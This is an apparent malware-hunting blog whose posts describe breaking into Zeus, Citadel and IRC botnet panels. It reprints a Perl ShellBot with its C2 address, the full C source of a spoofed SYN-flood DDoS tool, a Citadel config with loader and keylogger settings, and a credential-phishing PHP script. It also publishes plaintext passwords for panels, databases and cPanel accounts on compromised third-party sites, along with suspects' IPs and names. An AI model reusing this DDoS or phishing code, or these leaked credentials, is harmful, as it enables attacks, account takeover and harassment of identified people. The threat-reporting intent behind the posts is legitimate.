Pages

Showing posts with label Owned. Show all posts
Showing posts with label Owned. Show all posts

Saturday, November 19, 2016

5k - Perl/ShellBot.B ddos - IRC









# TeaMrx Perlbot vS xeQT


my @mast3rs = ("Low","Loww");


my @admchan=("#Perli");

$servidor='188.119.151.131' unless $servidor;  // his server 


my $xeqt = "!x";
my $homedir = "/tmp";
my $shellaccess = 1;
my $xstats = 1;
my $pacotes = 1;
my $linas_max = 5;
my $sleep = 6;
my $portime = 4;

my @fakeps = ("/usr/local/apache/bin/httpd -DSSL",
    "/usr/sbin/httpd -k start -DSSL",
    "/usr/sbin/httpd",
    "spamd child",
    "httpd");

my @nickname = ("TeaMrx","......","xQt");

my @xident = ("noway",......yn","ju");

my @xname = ("Googurl (C) 2006 xeQt","........","Team Work","jet lie");

#################
# Random Ports
#################
my @rports = ("6667");

my @Mrx = ("\001mIRC32 v5.91 K.Mardam-Bey\001","\001mIRC v6.2 Khaled Mardam-Bey\001",
    "\001mIRC v6.03 Khaled Mardam-Bey\001","\001mIRC v6.14 Khaled Mardam-Bey\001",
    "\001mIRC v6.15 Khaled Mardam-Bey\001","\001mIRC v6.16 Khaled Mardam-Bey\001",
    "\001mIRC v6.17 Khaled Mardam-Bey\001","\001mIRC v6.21 Khaled Mardam-Bey\001",
    "\001Snak for Macintosh 4.9.8 English\001",
    "\001DvC v0.1 PHP-5.1.1 based on Net_SmartIRC\001",
    "\001PIRCH98:WIN 95/98/WIN NT:1.0 (build 1.0.1.1190)\001",
    "\001xchat 2.6.2 Linux 2.6.18.5 [i686/2.67GHz]\001",
    "\001xchat:2.4.3:Linux 2.6.17-1.2142_FC4 [i686/2,00GHz]\001",
    "\001xchat:2.4.3:Linux 2.6.17-1.2142_FC4 [i686/1.70GHz]\001",
    "\001XChat-GNOME IRC Chat 0.16 Linux 2.6.20-8-generic [i686]\001",
    "\001ircN 7.27 + 7.0 - -\001","\001..(argon/1g) :bitchx-1.0c17\001",
    "\001ircN 8.00  -  he tries to tell me what I put inside of me  - \001",
    "\001FreeBSD!4.11-STABLE bitchx-1.0c18 - prevail[0123] :down with people\001",
    "\001BitchX-1.0c19+ by panasync - Linux 2.4.31 : Keep it to yourself!\001",
    "\001BitchX-1.0c19+ by panasync - Linux 2.4.33.3 : Keep it to yourself!\001",
    "\001BitchX-1.1-final+ by panasync - Linux 2.6.18.1 : Keep it to yourself!\001",
    "\001BitchX-1.0c19 by panasync - freebsd 4.10-STABLE : Keep it to yourself!\001",
    "\001BitchX-1.1-final+ by panasync - FreeBSD 4.5-STABLE : Keep it to yourself!\001",
    "\001BitchX-1.1-final+ by panasync - FreeBSD 6.0-RELEASE : Keep it to yourself!\001",
    "\001BitchX-1.1-final+ by panasync - FreeBSD 5.3-RELEASE : Keep it to yourself!\001",
    "\001bitchx-1.0c18 :tunnelvision/1.2\001","\001PnP 4.22 - http://www.pairc.com/\001",
    "\001BitchX-1.0c17/FreeBSD 4.10-RELEASE:(c)rackrock/bX [3.0.1á9] : Keep it to yourself!\001",
    "\001P&P 4.22.2 (in development) + X Z P Bots, Sound, NickServ, ChanServ, Extras\001",
    "\001HydraIRC v0.3.148 (18/Jan/2005) by Dominic Clifton aka Hydra - #HydraIRC on EFNet\001",
    "\001irssi v0.8.10 - running on Linux i586\001","\001irssi v0.8.10 - running on FreeBSD i386\001",
    "\001ircII 20050423+ScrollZ 1.9.5 (19.12.2004)+Cdcc v1.6mods v1.0 by acidflash - Almost there\001",
    "\001ircII 20050423+ScrollZ 1.9.5 (19.12.2004)+Cdcc v1.8+OperMods v1.0 by acidflash - Almost there\001");

# Default quick scan ports
my @portas=("21","22","23","25","53","80","110","113","143","3306","4000","5900","6667","6668","6669","7000","10000","12345","31337","65501");

# xeQt

#my $nick = "sshb0t1";
my $nick = $nickname[rand scalar @nickname];
my $realname = $xname[rand scalar @xname];
my $ircname = $xident[rand scalar @xident];
my $porta = $rports[rand scalar @rports];
my $xproc = $fakeps[rand scalar @fakeps];
my $Mrx = $Mrx[rand scalar @Mrx];
my $version = 'vSm0d (C) TeaMrx';

$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';

use IO::Socket;
use Socket;
use IO::Select;
chdir("$homedir");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$xproc"."\0";
my $pid=fork;
exit if $pid;
die "[x] -> Cannot fork into background: $!" unless defined($pid);
my %irc_servers;
my %DCC;
my $dcc_sel = new IO::Select->new();

sub getnick {
  return "$nickname[rand scalar @nickname]".int(rand(1000));
}

neeedd to delete some shit coz site gets blacklisted

  }

ahh found this in his spreaading ftp maybe interesting to someone ....


/* "DOMINATE" Attack Script, this script was so difficult to make, it required taking the very public ESSYN
attack script, and replacing "tcph->res2 = 1;" to "tcph->res2 = 3;" in the "setup_tcp_header" function.
Anybody who purchased this script for $300 BTC, yup, it's literally changing a 1 to a 3.
*/
#include unistd.h
#include time.h
#include sys/types.h
#include sys/socket.h
#include sys/ioctl.h
#include string.h
#include stdlib.h
#include stdio.h
#include pthread.h
#include netinet/tcp.h
#include netinet/ip.h
#include netinet/in.h
#include netinet/if_ether.h
#include netdb.h
#include net/if.h
#include arpa/inet.h

#define MAX_PACKET_SIZE 4096
#define PHI 0x9e3779b9

static unsigned long int Q[4096], c = 362436;
static unsigned int floodport;
volatile int limiter;
volatile unsigned int pps;
volatile unsigned int sleeptime = 100;

void init_rand(unsigned long int x)
{
 int i;
 Q[0] = x;
 Q[1] = x + PHI;
 Q[2] = x + PHI + PHI;
 for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
}
unsigned long int rand_cmwc(void)
{
 unsigned long long int t, a = 18782LL;
 static unsigned long int i = 4095;
 unsigned long int x, r = 0xfffffffe;
 i = (i + 1) & 4095;
 t = a * Q[i] + c;
 c = (t >> 32);
 x = t + c;
 if (x < c) {
  x++;
  c++;
 }
 return (Q[i] = r - x);
}
unsigned short csum (unsigned short *buf, int count)
{
 register unsigned long sum = 0;
 while( count > 1 ) { sum += *buf++; count -= 2; }
 if(count > 0) { sum += *(unsigned char *)buf; }
 while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
 return (unsigned short)(~sum);
}

unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {

 struct tcp_pseudo
 {
  unsigned long src_addr;
  unsigned long dst_addr;
  unsigned char zero;
  unsigned char proto;
  unsigned short length;
 } pseudohead;
 unsigned short total_len = iph->tot_len;
 pseudohead.src_addr=iph->saddr;
 pseudohead.dst_addr=iph->daddr;
 pseudohead.zero=0;
 pseudohead.proto=IPPROTO_TCP;
 pseudohead.length=htons(sizeof(struct tcphdr));
 int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
 unsigned short *tcp = malloc(totaltcp_len);
 memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
 memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
 unsigned short output = csum(tcp,totaltcp_len);
 free(tcp);
 return output;
}

void setup_ip_header(struct iphdr *iph)
{
 iph->ihl = 5;
 iph->version = 4;
 iph->tos = 0;
 iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
 iph->id = htonl(54321);
 iph->frag_off = 0;
 iph->ttl = MAXTTL;
 iph->protocol = 6;
 iph->check = 0;
 iph->saddr = inet_addr("192.168.3.100");
}

void setup_tcp_header(struct tcphdr *tcph)
{
 tcph->source = htons(5678);
 tcph->seq = rand();
 tcph->ack_seq = 0;
 tcph->res2 = 3;
 tcph->doff = 5;
 tcph->syn = 1;
 tcph->window = htonl(65535);
 tcph->check = 0;
 tcph->urg_ptr = 0;
}

void *flood(void *par1)
{
 char *td = (char *)par1;
 char datagram[MAX_PACKET_SIZE];
 struct iphdr *iph = (struct iphdr *)datagram;
 struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
 
 struct sockaddr_in sin;
 sin.sin_family = AF_INET;
 sin.sin_port = htons(floodport);
 sin.sin_addr.s_addr = inet_addr(td);

 int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
 if(s < 0){
  fprintf(stderr, "Could not open raw socket.\n");
  exit(-1);
 }
 memset(datagram, 0, MAX_PACKET_SIZE);
 setup_ip_header(iph);
 setup_tcp_header(tcph);

 tcph->dest = htons(floodport);

 iph->daddr = sin.sin_addr.s_addr;
 iph->check = csum ((unsigned short *) datagram, iph->tot_len);

 int tmp = 1;
 const int *val = &tmp;
 if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
  fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
  exit(-1);
 }

 init_rand(time(NULL));
 register unsigned int i;
 i = 0;
 while(1){
  sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));

  iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
  iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
  iph->check = csum ((unsigned short *) datagram, iph->tot_len);
  tcph->seq = rand_cmwc() & 0xFFFF;
  tcph->source = htons(rand_cmwc() & 0xFFFF);
  tcph->check = 0;
  tcph->check = tcpcsum(iph, tcph);
  
  pps++;
  if(i >= limiter)
  {
   i = 0;
   usleep(sleeptime);
  }
  i++;
 }
}
int main(int argc, char *argv[ ])
{
 if(argc < 6){
  fprintf(stderr, "Invalid parameters!\n");
  fprintf(stdout, "Usage: %s     


Tuesday, February 10, 2015

Zeus / Cryptlocker - skid - information@jupimail.com

Found an easy modified zeus panel , after puting a shell into
so we got user and pass from database i found there was an
script enabled for download and execute a file see at pic3







Virustotatl update.src .. this is a cryptlocker



also the desktop after it execution



So it give's an email address and says that conntact him and send him an sum from 100$ then we get our files back ,
so i wrote him an email just for fun and after some conversation i told him i dont know what bitcoin is im just a stupid
user that lost his data and just want my data back, he responded like this



also an identity of a person , not sure if he is or like he said just a drop but he also send me other name's



I almost got him lol see following picture ..



and ye this was hist last message , PS lulz at his english


Bro you seriousl or you malware reserceher?


i give you valid details

My name is Ivan Fedorov

i am in Latvia




You sure you wont myhelp

i am sent you N7 msg

any who REALY need data computer ASK N1 GET BITCOIN


MAKE IN 48 HOURZ


I UZE ZEUS BOTNETZ

ANTI CORUPTIONZ ANTI ILLUMINATI SYSEM

HOW YOU R MOMA DIE SLOW IN HOSPITAL

YOU BE SOME 1 GUY RUS HOW YOU ПИДАРАЗ
MAKE PAUZE YOUR SELF!


ты вставляешь пралки в калеса я рублюза за норм и не трогаю руских


ты тебя мама кормит она скора умрет и будет повышенпие оплат за квартиры и за еду и комунальных услуг и тд


короче нахуй ты мне тут мозг ееш и на тебя размениваться

ЧТОБ ТВОЯ МАМА УМЕРЛА


YOUR MOM EAT MY EXE

DON KILUMINATI 7 DAY THEORY

Sunday, February 8, 2015

IRC Botnet - 218.200.153.154 - PWNED

I don't know if this kid is just stupid or he really trying to dox me ,
if so keep it going lol . Another attack from him on my honeypot

and aggain he is using an IRC server for hosting bot's

PWNED aggain .. lolz

Sunday, January 4, 2015

Citadel - cynthialemos1225.ddns.net ( Richy Adams ) - Exposed



// config.php
$config = array (
  'mysql_host' => 'localhost',
  'mysql_user' => 'root',
  'mysql_pass' => 'qwerty23456@',
  'mysql_db' => 'tenna',
  'reports_path' => '_reports1190699691',
  'reports_to_db' => 1,
  'reports_to_fs' => 0,
  'reports_geoip' => 0,
  'jabber' => 
  array (
    'host' => '',
    'login' => '',
    'pass' => '',
    'port' => 5222,
  ),
  'reports_jn' => 0,
  'reports_jn_logfile' => '_reports1190699691/jabber.log',
......
  ),
  'allowed_countries_enabled' => 0,
  'allowed_countries' => '',
  'botnet_timeout' => 1500,
  'botnet_cryptkey' => 'sgasgdsgdshwgrekhgjlksdng',
);
$config['botnet_cryptkey_bin'] = array(200, 56, 101, 2, 42, 30, 79, 114, 114, 231, 90, 185, 178, 234, 43, 113, 77, 215, 74, 251, 72, 147, 112, 209, 143, 3, 221, 34, 213, 155, 59, 1, 102, 95, 251, 64, 4, 6, 37, 10, 88, 115, 111, 203, 37, 251, 237, 91, 59, 186, 76, 153, 210, 127, 255, 187, 176, 187, 202, 17, 228, 83, 73, 72, 124, 73, 129, 105, 86, 226, 91, 206, 125, 149, 142, 159, 128, 61, 189, 143, 202, 109, 63, 124, 118, 48, 176, 36, 177, 181, 123, 0, 242, 220, 30, 100, 232, 246, 146, 150, 224, 233, 252, 198, 250, 44, 26, 146, 38, 153, 1, 249, 208, 171, 247, 133, 20, 117, 173, 227, 152, 170, 248, 62, 39, 119, 169, 200, 110, 65, 11, 164, 164, 19, 183, 7, 133, 13, 238, 205, 87, 28, 86, 60, 67, 222, 16, 128, 64, 138, 200, 81, 75, 12, 62, 240, 23, 168, 201, 190, 47, 180, 95, 214, 218, 206, 128, 162, 169, 78, 44, 174, 116, 45, 161, 245, 27, 142, 18, 86, 92, 195, 155, 78, 248, 150, 58, 54, 14, 174, 88, 211, 197, 35, 19, 142, 10, 99, 5, 33, 137, 161, 65, 175, 51, 91, 107, 201, 193, 40, 150, 218, 105, 129, 115, 168, 41, 57, 244, 108, 29, 130, 231, 141, 236, 214, 182, 177, 9, 21, 229, 57, 90, 100, 140, 106, 93, 217, 213, 158, 221, 17, 38, 98, 165, 123, 199, 76, 223, 239, 154, 110, 16, 229, 190, 4);
return $config;


config.txt / from builder
entry "StaticConfig"
  botnet "CIT"
  timer_config 4 9
  timer_logs 3 6
  timer_stats 4 8
  timer_modules 1 4
  timer_autoupdate 8
  url_config1 "http://richyadams.zapto.org/xampp/link/config.bin"
  
  remove_certs 1
;  disable_tcpserver 0
  disable_cookies 0
  encryption_key "jzhbfgjdhbgjhddkjgskdj"
  report_software 1
  enable_luhn10_get 0
  enable_luhn10_post  1
  disable_antivirus 0
  use_module_video 1
  antiemulation_enable 0
  disable_httpgrabber 0
  use_module_ffcookie 1
end
entry "DynamicConfig"
  url_loader "http://richyadams.zapto.org/xampp/link/soft.exe"
  url_server "http://richyadams.zapto.org/xampp/link/gate.php"
  file_webinjects "injects.txt"
  url_webinjects "http://richyadams.zapto.org/xampp/link/file.php"
  entry "AdvancedConfigs"
    "http://richyadams.zapto.org/xampp/link/config.bin"
 "http://richyadams.zapto.org/xampp/link/config.bin"
  end
  entry "WebFilters"
    "#*wellsfargo.com/*"
    "@*payment.com/*"
    "!http://*.com/*.jpg"
  end
  entry HttpVipUrls
    "*facebook.com/*"
  end
  entry "WebDataFilters"
  end
  entry "WebFakes"
  end
  entry "CmdList"
    "hostname"
    "tasklist"
    "ipconfig /all"
 "netsh firewall set opmode disable"
  end
  entry "Keylogger"
    processes "bank.exe;java.exe"
    time 3
  end
  entry "Video"
    quality 1
    length 600
  end
end

Not many bots Richy ..

 // Here is the admin ip address !
41.138.188.121 - - [02/Jan/2015:21:46:00 +0100] "GET /xampp/link/cp.php?m=home HTTP/1.1" 200 224893 "http://cynthialemos1225.ddns.net/xampp/link/cp.php?m=home" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"




He's location based on the ip
and here is a pic of him




luv ur pix too !!

Saturday, December 6, 2014

Zeus Botnet - 54.201.153.149 - Owned









// version 2.0.8.9
// admin user 
admin : mentman1
// ftp : 
deamon:xampp
// config 
#?php
$config['mysql_host']          = '127.0.0.1';
$config['mysql_user']          = 'daemon';
$config['mysql_pass']          = 'jG9mBvGQM7Jhbv62';
$config['mysql_db']            = 'evildb';
$config['reports_path']        = '_feedback';
$config['reports_to_db']       = 1;
$config['reports_to_fs']       = 1;
$config['reports_no_shit']     = 1;
$config['reports_jn']          = 0;
$config['reports_jn_logfile']  = '';
$config['reports_jn_account']  = '';
$config['reports_jn_pass']     = '';
$config['reports_jn_server']   = '';
$config['reports_jn_port']     = 5222;
$config['reports_jn_to']       = '';
$config['reports_jn_list']     = '';
$config['reports_jn_script']   = '';
$config['reports_dyncfg']      = 0;
$config['reports_dyncfg_script']  = '';
$config['membership_timeout']      = 1500;
$config['membership_cryptkey']     = 'ovWPvhfFJ';
$config['membership_cryptkey_bin'] = array(111, 27, 63, 146, 46, 219, 229, 29, 132, 252, 195, 222, 120, 85, 235, 8, 237, 173, 210, 215, 196, 14, 183, 54, 105, 33, 119, 230, 86, 101, 117, 93, 3, 131, 112, 197, 36, 147, 74, 89, 212, 64, 21, 207, 15, 60, 224, 30, 1, 141, 250, 32, 94, 194, 90, 72, 77, 214, 134, 165, 0, 126, 199, 115, 255, 193, 245, 52, 118, 99, 48, 49, 187, 104, 159, 163, 244, 148, 190, 221, 26, 247, 191, 88, 103, 62, 133, 70, 108, 208, 216, 82, 114, 124, 243, 186, 71, 100, 211, 169, 246, 138, 10, 57, 16, 180, 200, 125, 202, 150, 236, 130, 129, 149, 189, 22, 168, 201, 80, 184, 67, 233, 106, 172, 84, 177, 158, 28, 151, 209, 182, 161, 154, 171, 102, 227, 248, 40, 92, 58, 152, 95, 142, 68, 156, 97, 17, 20, 254, 251, 13, 107, 223, 56, 160, 50, 228, 51, 79, 66, 9, 91, 75, 232, 239, 2, 83, 144, 45, 35, 166, 37, 181, 240, 6, 65, 185, 253, 5, 18, 25, 145, 188, 137, 192, 127, 128, 98, 19, 155, 34, 38, 178, 213, 136, 31, 198, 140, 205, 123, 206, 231, 226, 55, 238, 87, 203, 24, 109, 122, 69, 110, 157, 59, 242, 42, 81, 135, 218, 121, 170, 41, 76, 179, 12, 139, 96, 204, 241, 11, 164, 53, 249, 44, 23, 43, 78, 113, 217, 220, 234, 116, 4, 7, 73, 176, 175, 174, 225, 143, 47, 39, 167, 153, 162, 61);
?#
// extracted by Xylitol 
RC4 Keystream    6f1b3f922edbe51d84fcc3de7855eb08edadd2d7c40eb736692177e65665755d038370c524934a59d44015cf0f3ce01e018dfa205ec25a484dd686a5007ec773ffc1f53476633031bb689fa3f494bedd1af7bf58673e85466cd0d852727cf3ba4764d3a9f68a0a3910b4c87dca96ec828195bd16a8c950b843e96aac54b19e1c97d1b6a19aab66e3f8285c3a985f8e449c611114fefb0d6bdf38a032e4334f42095b4be8ef0253902d23a625b5f00641b9fd05121991bc89c07f8062139b2226b2d5881fc68ccd7bcee7e237ee57cb186d7a456e9d3bf22a5187da79aa294cb30c8b60ccf10ba435f92c172b4e71d9dcea74040749b0afaee18f2f27a799a23d
    hxxp://54.201.153.149/ontrack-list/controller/theboldandthebeaded.php
    hxxp://54.201.153.149/ontrack-list/controller/hamilton.bin

Saturday, November 8, 2014

Zeus - berizka.gorodok.km.ua - Botnet



// mysql config from bot 
$config['mysql_host']          = '127.0.0.1';
$config['mysql_user']          = 'berizka_image';
$config['mysql_pass']          = 'olaoluwa!@#';
$config['mysql_db']            = 'berizka_image';
// zeus panel 
hxxp://berizka.gorodok.km.ua/core/auth/image/cp.php
admin:dragob

Thursday, November 6, 2014

Zeus Citadel - 65.200.132.20 - Botnet







the admin ....



// panel 
http://65.200.132.20/webalizer/webdav/cp.php
admin:govno
// email used for phishing 
kotak4amal@gmail.com
// scan4you account and jabber
  'scan4you_jid' => 'uznik15@jabber.ru',
  'scan4you_id' => '29719',
  'scan4you_token' => 'd47310b2beea51ec546e',
// m.php
<?include 'images/validate_form.js';



$ip = getenv("REMOTE_ADDR");

$message .= "-------- XxX  *~* Mr-Lordz *~*  XxX-------\n";

$message .= "User-ID: ".$_POST['user']."\n";

$message .= "Password: ".$_POST['passwd']."\n";

$message .= "IP: ".$ip."\n";

$message .= "-------------Created By Mr-lordz--------------\n";



$recipient = "kotak4amal@gmail.com";

$subject = "ComCastID ~ $ip";

$headers = "From: ";

$headers .= $_POST['eMailAdd']."\n";

$headers .= "MIME-Version: 1.0\n";

mail($recipient,$subject,$message,$headers);

     if (mail($recipent,$subject,$message,$headers))

       {

           header("Location: billing.htm");



       }

else

           {

         echo "ERROR! Please go back and try again.";

         }



?> 

Zeus - sip1distribution.com - Botnet






Some photos of the admin ..

 




// admin ip 
hxxp://www.utrace.de/?query=41.79.219.204
// zeus panel 
admin:thankgod123
hxxp://sip1distribution.com/.zerd/cp.php
// mysql 
$config['mysql_host']          = '127.0.0.1';
$config['mysql_user']          = 'sip1dist_admin';
$config['mysql_pass']          = 'thankgod123';
$config['mysql_db']            = 'sip1dist_admin';

Wednesday, November 5, 2014

Zbot - kihsmalta.com - Hacked






// http://urlquery.net/report.php?id=1415211438936

// zeus panel 
hxxp://kihsmalta.com/cp.php

// .htacces file
deny from quttera.com
deny from hosts-file.net
deny from amada.abuse.ch
deny from palevotracker.abuse.ch
deny from blogger.com
deny from phishtank.com
deny from netcraft.com
deny from google.com
deny from yahoo.com
deny from malwared.ru
deny from malware.com.br
deny from malekal.com
deny from k7computing.com 
deny from gdata.com
deny from gdatasoftware.com
deny from fortinet.com
deny from emsisoft.com
deny from quttera.com
deny from opera.com
deny from infospyware.com
deny from .................... etc 

 allow from all

 allow from all
 
# Block shell uploaders, htshells, and other baddies
RewriteCond %{REQUEST_URI} ((php|my|bypass)?shell|remview.*|phpremoteview.*|sshphp.*|pcom|nstview.*|c99|c100|r57|webadmin.*|phpget.*|phpwriter.*|fileditor.*|locus7.*|storm7.*)\.(p?s?x?htm?l?|txt|aspx?|cfml?|cgi|pl|php[3-9]{0,1}|jsp?|sql|xml) [NC,OR]
RewriteCond %{REQUEST_URI} (\.exe|\.php\?act=|\.tar|_vti|afilter=|algeria\.php|chbd|chmod|cmd|command|db_query|download_file|echo|edit_file|eval|evil_root|exploit|find_text|fopen|fsbuff|fwrite|friends_links\.|ftp|gofile|grab|grep|htshell|\ -dump|logname|lynx|mail_file|md5|mkdir|mkfile|mkmode|MSOffice|muieblackcat|mysql|owssvr\.dll|passthru|popen|proc_open|processes|pwd|rmdir|root|safe0ver|search_text|selfremove|setup\.php|shell|ShellAdresi\.TXT|spicon|sql|ssh|system|telnet|trojan|typo3|uname|unzip|w00tw00t|whoami|xampp) [NC,OR]
RewriteCond %{QUERY_STRING} (\.exe|\.tar|act=|afilter=|alter|benchmark|chbd|chmod|cmd|command|cast|char|concat|convert|create|db_query|declare|delete|download_file|drop|edit_file|encode|environ|eval|exec|exploit|find_text|fsbuff|ftp|friends_links\.|globals|gofile|grab|insert|localhost|logname|loopback|mail_file|md5|meta|mkdir|mkfile|mkmode|mosconfig|muieblackcat|mysql|order|passthru|popen|proc_open|processes|pwd|request|rmdir|root|scanner|script|search_text|select|selfremove|set|shell|sql|sp_executesql|spicon|ssh|system|telnet|trojan|truncate|uname|union|unzip|whoami) [NC] 
RewriteRule .* - [F]

/// extracted from xylitolMalware family    ZEUS
MD5    8f6b9dbfb715c4a8166401e6fc511964
Version    2.1.0.1
RC4 Keystream    21db88b013ff66617997a990f083df91ac7327b64287569a376a5a63ee4abf234da43d2e758644c919788bc09200957d7b04084fa6dc1503e753f50257f10b121caea254c5be6d55fbaa07d21b777e2a67100ff27c6072d343ca9dbc80eb2f2ccd5293711ae6d9c365b5f8f3ddd83550189c3a418a8c9406b96bce25cb38d4d0695f8999e8d7fa0c013c2833e5a5cfcc5e14c61e816ca04bb2c1bac776170adaf451322d40e9e2ef3ea3bb11456fe1d5294e0eea1dfc85b38df9d659393174263447b4ec5b84f70d58deb85ca798c848c28e05f67ae39bed9f647062e47f682b209609c4fe6eb11f4caf8f22d1a182a8abb73f3b1624fd36465dbdad309ee049

Tuesday, November 4, 2014

Zbot - menumaterno.com.br - Hacked





$config['mysql_host']          = '127.0.0.1';
$config['mysql_user']          = 'materno_labe';
$config['mysql_pass']          = '1qaz2wsx';
$config['mysql_db']            = 'materno_labe';

// hxxp://menumaterno.com.br/skins/tango/thumb.php [shell]

// zeus panel 
hxxp://menumaterno.com.br/skins/tango/_labe/cp.php?m=home
user : admin
pass : 1qaz2wsx

[cpan]
password=provnet13
user=materno

Zbot - e-rbi.org - Hacked








hxxp://e-rbi.org/03/serverphp/cp.php

All info ( php shell , zeus panel ) conntact me at my email !!

Zbot - www.oei.org.ar - Hacked





//report
hxxps://zeustracker.abuse.ch/monitor.php?host=www.oei.org.ar
// interesting script "cn.pl" found at 
/home/oeiorgar/cn.pl
// http://pastebin.com/y5CYspZG
all information ( shell path , zeus panel and other ) conntact me at email !!

Sunday, November 2, 2014

Zbot - optometriaortopticamendezronderos.com - Hacked









$config['mysql_host']          = '127.0.0.1';
$config['mysql_user']          = 'optometr_server';
$config['mysql_pass']          = '123qwe';
$config['mysql_db']            = 'optometr_server';
// hxxp://optometriaortopticamendezronderos.com/css/upload/login/cp.php?m=login
user : admin
pass(md5) : 786b754d2b4902cb348bb59d7cff0004
pass : alexgrema

// second zbot panel (index)
// hxxp://optometriaortopticamendezronderos.com/css/index/cp.php?m=login
$config['mysql_host']          = '127.0.0.1';
$config['mysql_user']          = 'optometr_ff';
$config['mysql_pass']          = '123qwe';
$config['mysql_db']            = 'optometr_ff';

user : admin
pass(md5) : fc7d1bcf2447219eb208b96aa3d0a58c
pass : salamsalam

// zip file found on server 
hxxps://www.sendspace.com/file/s3k9i8

Saturday, November 1, 2014

Zbot - dairyforsale.com.au - Hacked









hxxp://dairyforsale.com.au/images/roy/cp.php

// config
$config['mysql_host']          = '127.0.0.1';
$config['mysql_user']          = 'dairy_roy';
$config['mysql_pass']          = 'thankgod123';
$config['mysql_db']            = 'dairy_roy';

// zeus panel
user : admin
pass : 12345678

// shell 
hxxp://dairyforsale.com.au/cache/m.php

// cpanel 
user = 'dairy';
pass = 'vatbuster';

Thursday, October 30, 2014

Zbot - vinltd.com - Hacked







// zeus panel
http://vinltd.com/suz/cp.php 
user : admin 
pass : profyle187

// mysql
$config['mysql_host']          = '127.0.0.1';
$config['mysql_user']          = 'vinltdco_suz';
$config['mysql_pass']          = 'profyle187';
$config['mysql_db']            = 'vinltdco_suz';

// shell 
hxxp://vinltd.com/info.php
// note account suspended !